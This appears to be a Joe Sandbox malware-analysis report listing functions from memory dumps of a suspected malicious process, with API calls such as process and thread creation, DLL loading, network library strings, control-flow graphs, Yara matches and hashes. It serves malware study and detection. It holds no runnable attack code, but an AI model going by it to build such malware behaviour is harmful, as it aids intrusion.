                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 50284f0872f6bd13bee4722ca0aa299785866a75a046f9a00bd71edd1b806893
                                                                                                                                                  • Instruction ID: 1f538fb53d99e6bfc149984a32c677f1ec99147071e55d2b291bc8d842517e50
                                                                                                                                                  • Opcode Fuzzy Hash: 50284f0872f6bd13bee4722ca0aa299785866a75a046f9a00bd71edd1b806893
                                                                                                                                                  • Instruction Fuzzy Hash: 9A900225211500032105F5580B08547008E8BD9355355C031F1417550CD621D9615561
                                                                                                                                                  Function 049A2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 7f56d194f95ab264e8a3f935b9330ca345c144b2e9143ec3ce1d9c3acb37cb42
                                                                                                                                                  • Instruction ID: 39bb1d6bceb62cfdcfb486168c349f4e52e6eec06a0c0ffb5cb4d75920d9d6d5
                                                                                                                                                  • Opcode Fuzzy Hash: 7f56d194f95ab264e8a3f935b9330ca345c144b2e9143ec3ce1d9c3acb37cb42
                                                                                                                                                  • Instruction Fuzzy Hash: 3E900225221500022145F5580B0854B048D9BDA355395C025F1817590CC621D9655761
                                                                                                                                                  Function 049A2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: d8bd0cba3fec975564aa1e2a718f3e0431638f31db7639c01dc26657fbda0b61
                                                                                                                                                  • Instruction ID: 2b51febf37e983420d053e71831709be9d49e782936e74b09982804faf38b59a
                                                                                                                                                  • Opcode Fuzzy Hash: d8bd0cba3fec975564aa1e2a718f3e0431638f31db7639c01dc26657fbda0b61
                                                                                                                                                  • Instruction Fuzzy Hash: EB90023160550802F150B1584918786004D8BD4305F55C021A0426654D8755DB557AE1
                                                                                                                                                  Function 049A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9b89e3ea8dbd86de19591ae681b0d7c079f88556100f1e8f1f2fda84540be2cd
                                                                                                                                                  • Instruction ID: e6c1de983b77e588e8a83505fbee7a13d24c35259fc5403711ad0876354ef356
                                                                                                                                                  • Opcode Fuzzy Hash: 9b89e3ea8dbd86de19591ae681b0d7c079f88556100f1e8f1f2fda84540be2cd
                                                                                                                                                  • Instruction Fuzzy Hash: 8290023120150802F180B158490868A004D8BD5305F95C025A0427654DCA15DB597BE1
                                                                                                                                                  Function 049A2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: e96ade282109d3a0a82f36ac539843ec2fb92193bb4e708834ae5996d302ba73
                                                                                                                                                  • Instruction ID: ba820372892dee031f416e462c972786685941f02baafc475902e22fbbc8b3b5
                                                                                                                                                  • Opcode Fuzzy Hash: e96ade282109d3a0a82f36ac539843ec2fb92193bb4e708834ae5996d302ba73
                                                                                                                                                  • Instruction Fuzzy Hash: 4690023120554842F140B1584908A86005D8BD4309F55C021A0466694D9625DE55BAA1
                                                                                                                                                  Function 049A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 725f3b23217847736b79de9cede0209e026d7a131580f1ef1778711e1242ac7b
                                                                                                                                                  • Instruction ID: 577fa960d360b8712a8df5558a4934d4ca89d3017182315b8439d38e1040ee7b
                                                                                                                                                  • Opcode Fuzzy Hash: 725f3b23217847736b79de9cede0209e026d7a131580f1ef1778711e1242ac7b
                                                                                                                                                  • Instruction Fuzzy Hash: 63900261202500036105B1584918656404E8BE4205B55C031E1416590DC525D9916565
                                                                                                                                                  Function 049A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c14c476d65d765e4f462c297d0e1a9fb9615cb33e2c9cbf363bcfb283af774fe
                                                                                                                                                  • Instruction ID: 19ff4527b287843ea93f9bdeabb9917b2cc7432da4f82f3e517b153c049c4628
                                                                                                                                                  • Opcode Fuzzy Hash: c14c476d65d765e4f462c297d0e1a9fb9615cb33e2c9cbf363bcfb283af774fe
                                                                                                                                                  • Instruction Fuzzy Hash: E090023160560402F100B1584A18746104D8BD4205F65C421A0826568D8795DA5169E2
                                                                                                                                                  Function 049A39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f7dbc1ac92a4d43a170cc00491f2f2505637098916cea512587b2b391c95a440
                                                                                                                                                  • Instruction ID: ce8c009d9bea59f02a317bd1f8fa6d95493c8ff7c56298132ff6cc25ad05d913
                                                                                                                                                  • Opcode Fuzzy Hash: f7dbc1ac92a4d43a170cc00491f2f2505637098916cea512587b2b391c95a440
                                                                                                                                                  • Instruction Fuzzy Hash: 3890022124555102F150B15C4908656404DABE4205F55C031A0C16594D8555D9556661
                                                                                                                                                  Function 007B3AC0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 256COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 395 7b3ac0-7b3ad8 396 7b3ada-7b3b04 395->396 397 7b3a5c-7b3a65 395->397 398 7b3b05-7b3b0f 396->398 397->395 399 7b3b2c-7b3b45 398->399 400 7b3b12-7b3b17 398->400 401 7b3b5e 399->401 402 7b3b47-7b3b57 399->402 400->398 404 7b3b5f-7b3b89 401->404 403 7b3b59 402->403 402->404 403->401 405 7b3b8b-7b3b8f 404->405 405->405 406 7b3b91-7b3b92 405->406 407 7b3b93-7b3b95 406->407 408 7b3b96-7b3b9c 407->408 409 7b3b9f-7b3ba1 408->409 409->409 410 7b3ba3-7b3baa 409->410 412 7b3c2b-7b3c30 410->412 413 7b3bac-7b3bb0 410->413 414 7b3c0a-7b3c10 412->414 415 7b3c32-7b3c36 412->415 416 7b3bb1-7b3bb5 413->416 417 7b3bbf-7b3bc2 414->417 418 7b3c12-7b3c26 414->418 419 7b3c38-7b3c3b 415->419 420 7b3c40-7b3c50 415->420 421 7b3bb8-7b3bbb 416->421 422 7b3bde 417->422 423 7b3bc4-7b3bc7 417->423 418->416 424 7b3c28-7b3c29 418->424 425 7b3c3d 419->425 426 7b3c63-7b3ca8 call 7bb6e0 419->426 421->407 427 7b3bbd 421->427 430 7b3bdf-7b3bed 422->430 423->408 428 7b3bc9-7b3bcc 423->428 424->421 425->420 433 7b3cae-7b3d28 call 7bb7c0 call 7a4780 call 791410 call 7b1e50 426->433 434 7b3db4-7b3dba 426->434 427->417 432 7b3bee-7b3c01 430->432 432->414 435 7b3c59 432->435 445 7b3d30-7b3d44 Sleep 433->445 435->432 437 7b3c5b-7b3c5c 435->437 437->430 446 7b3d46-7b3d58 445->446 447 7b3da5-7b3dac 445->447 449 7b3d7a-7b3d92 446->449 450 7b3d5a-7b3d78 call 7b6110 446->450 447->445 448 7b3dae 447->448 448->434 451 7b3d98-7b3d9b 449->451 452 7b3d93 call 7b61b0 449->452 450->451 451->447 452->451
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: &uqp$net.dll$net.dll$wininet.dll
                                                                                                                                                  • API String ID: 0-4186712866
                                                                                                                                                  • Opcode ID: 159b206d8c714115a07a19644044b1503d8e1029e91f0b1b85f351a3056afe1c
                                                                                                                                                  • Instruction ID: df6d5133e92bbe1cd33fe240ba254785c01b854d8c6a05428736cf72fa14cd63
                                                                                                                                                  • Opcode Fuzzy Hash: 159b206d8c714115a07a19644044b1503d8e1029e91f0b1b85f351a3056afe1c
                                                                                                                                                  • Instruction Fuzzy Hash: 3D81A7B1605641EFC710DF74C885BE6BFB5EF86720F1005AEE4499B282D779AA81CBD0
                                                                                                                                                  Function 007B3C60 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 108sleepCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 455 7b3c60-7b3ca8 call 7bb6e0 459 7b3cae-7b3d28 call 7bb7c0 call 7a4780 call 791410 call 7b1e50 455->459 460 7b3db4-7b3dba 455->460 469 7b3d30-7b3d44 Sleep 459->469 470 7b3d46-7b3d58 469->470 471 7b3da5-7b3dac 469->471 473 7b3d7a-7b3d92 470->473 474 7b3d5a-7b3d78 call 7b6110 470->474 471->469 472 7b3dae 471->472 472->460 475 7b3d98-7b3d9b 473->475 476 7b3d93 call 7b61b0 473->476 474->475 475->471 476->475
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 007B3D3B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID: &uqp$net.dll$net.dll$wininet.dll
                                                                                                                                                  • API String ID: 3472027048-4186712866
                                                                                                                                                  • Opcode ID: 3cd7d863a0411402309c1b0d750c7f6afc6fdeb9c11ca20f138bd06456a8dd03
                                                                                                                                                  • Instruction ID: 410169b4089530138525b534578012919ae9b23704c7174f6f8bdf5e80ba45b1
                                                                                                                                                  • Opcode Fuzzy Hash: 3cd7d863a0411402309c1b0d750c7f6afc6fdeb9c11ca20f138bd06456a8dd03
                                                                                                                                                  • Instruction Fuzzy Hash: 023194B1A00605BFD714DF64C885FEBBBB9EB88714F10851DFA1D6B241D778AA40CBA0
                                                                                                                                                  Function 007AF70C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                  • String ID: @J7<
                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                  • Opcode ID: 7872565d10ae385b9da567bc3e2077f7517e2d9ae41fd5409d7ae801682b8cdc
                                                                                                                                                  • Instruction ID: fab0cf6061c6404b62c3e346de156011a0abd4a4320f45f07cdcbfaaf04e6426
                                                                                                                                                  • Opcode Fuzzy Hash: 7872565d10ae385b9da567bc3e2077f7517e2d9ae41fd5409d7ae801682b8cdc
                                                                                                                                                  • Instruction Fuzzy Hash: AD3121B5A00209DFDB10DFE8C8809EEB7B9FF89304B108559E505EB214D775AE45CBA0
                                                                                                                                                  Function 007AF710 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                  • String ID: @J7<
                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                  • Opcode ID: bd02f55d6ff694dab4282d25d7e0e9857bf84cd3291a04e7da901e714fa46167
                                                                                                                                                  • Instruction ID: 4a4bf49d67b6514b51524df6ce902f228f15c3658a8adbec87db6860bf96d73e
                                                                                                                                                  • Opcode Fuzzy Hash: bd02f55d6ff694dab4282d25d7e0e9857bf84cd3291a04e7da901e714fa46167
                                                                                                                                                  • Instruction Fuzzy Hash: 4F312FB5A0020AEFDB10DFD8C8809EFB7B9BF89304B108559E905EB214D775EE05CBA0
                                                                                                                                                  Function 007A4780 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007A47F2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                  • Opcode ID: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                                                  • Instruction ID: bdde08d983ab6c52115c33164e351c8e05309c394e7a3a319f5a0290b485ff5e
                                                                                                                                                  • Opcode Fuzzy Hash: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                                                  • Instruction Fuzzy Hash: 070112B5D0020DB7DF10DAA4DC46FDEB7B89B55308F008295A90897241F675EB54C791
                                                                                                                                                  Function 007B9AD0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,007A853E,00000010,?,?,?,00000044,?,00000010,007A853E,?,00000000,?), ref: 007B9B33
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                  • Opcode ID: 687a3d77a422e009e3ebd4f426a268b9f0e78d5b12e1023336294149405f3036
                                                                                                                                                  • Instruction ID: f554a6ec0121e3befb0beadc319c4242403c8464db13990837be15e11f1f4e0b
                                                                                                                                                  • Opcode Fuzzy Hash: 687a3d77a422e009e3ebd4f426a268b9f0e78d5b12e1023336294149405f3036
                                                                                                                                                  • Instruction Fuzzy Hash: 3801C0B2204108BBCB14DE89DC81EEB77ADAF8C754F418208FA49E7240D630F8518BA4
                                                                                                                                                  Function 00799EC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00799F05
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                  • Opcode ID: 9d9eb47022e0ba4cf8a86a4eb0f6c53c389c8eaeb9beb1ab0d331aac1328f1e8
                                                                                                                                                  • Instruction ID: cd6f6b2b4bebb2106ff96aeb1b1cc1c7bc5936974a0c4bf9aa9f94d35e79350c
                                                                                                                                                  • Opcode Fuzzy Hash: 9d9eb47022e0ba4cf8a86a4eb0f6c53c389c8eaeb9beb1ab0d331aac1328f1e8
                                                                                                                                                  • Instruction Fuzzy Hash: 7DF0653378420476E63165A9AC02FD7B79CCB84B61F550425FB0CEB1C1D999B40146E5
                                                                                                                                                  Function 00799EBC Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00799F05
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                  • Opcode ID: c15cbb83e1f55cf6f99d9edb9c5209c07016aea8d9047d2ba05255dc984c1e40
                                                                                                                                                  • Instruction ID: a7261093995c0c9cc6d160263c26add72d3fd16413d9021da60aaaf80829ed7c
                                                                                                                                                  • Opcode Fuzzy Hash: c15cbb83e1f55cf6f99d9edb9c5209c07016aea8d9047d2ba05255dc984c1e40
                                                                                                                                                  • Instruction Fuzzy Hash: 7FF0E53374020073E530B1699C03FD7B25CCB80B51F150428F70CAB2C0C956B80042A8
                                                                                                                                                  Function 007B99F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(007A1C89,?,?,007A1C89,OX{,?,?,007A1C89,OX{,00001000,?,?,00000000), ref: 007B9A2F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  • Opcode ID: a1630f8b6edca733148e3f098872d0a180684821db085e9ee2b0bfce84497063
                                                                                                                                                  • Instruction ID: 8100bc5e5bf04777459f8f4f26da5c7cdb2e273b2e79164086bdf8222738af88
                                                                                                                                                  • Opcode Fuzzy Hash: a1630f8b6edca733148e3f098872d0a180684821db085e9ee2b0bfce84497063
                                                                                                                                                  • Instruction Fuzzy Hash: C6E09A76200208BBDA10EF99DC49FEB33ACEFC8760F004419F908A7242D630BD108BB9
                                                                                                                                                  Function 007B9A40 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CBC1F08B,00000007,00000000,00000004,00000000,007A4005,000000F4), ref: 007B9A7F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: 32c6bd681a8d2f812b8a5a5ca8e219b681fbdb766c81b2f034a6e588bc96f94e
                                                                                                                                                  • Instruction ID: 3acc7c5824f9a15428546d5096cab93ec1fd2765f97cbd940fc20f43d7d8f61d
                                                                                                                                                  • Opcode Fuzzy Hash: 32c6bd681a8d2f812b8a5a5ca8e219b681fbdb766c81b2f034a6e588bc96f94e
                                                                                                                                                  • Instruction Fuzzy Hash: 40E0ED75204208BBD614EE59EC45FEB77ACEF89750F404419F918A7242D674B9208BB5
                                                                                                                                                  Function 007A8580 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 007A85AC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 991f414687a983ee23cfeb5a845e402e0688df1b044504f02f4e1a0ad6d07958
                                                                                                                                                  • Instruction ID: ab2ef68493c389910d0b2d2f495eb1f0c3164acb0667f6bd822a5e83e1b4a92e
                                                                                                                                                  • Opcode Fuzzy Hash: 991f414687a983ee23cfeb5a845e402e0688df1b044504f02f4e1a0ad6d07958
                                                                                                                                                  • Instruction Fuzzy Hash: A7E02631A4020827EB207AA8DC4AFA6334C9B88B20F4C0760FC2CCB3C2F93CF9114192
                                                                                                                                                  Function 007A8367 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,007A1F80,007B818F,OX{,007A1F46), ref: 007A83A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: 148eedaff8db55bf3a5833782b49742d7358bd3f5b029d745b75592f1cb1fe80
                                                                                                                                                  • Instruction ID: 1ee91f9d58dc79a058a9e80aea21e9eccc4d6f41d611f7e8d8ec8444fad56ec3
                                                                                                                                                  • Opcode Fuzzy Hash: 148eedaff8db55bf3a5833782b49742d7358bd3f5b029d745b75592f1cb1fe80
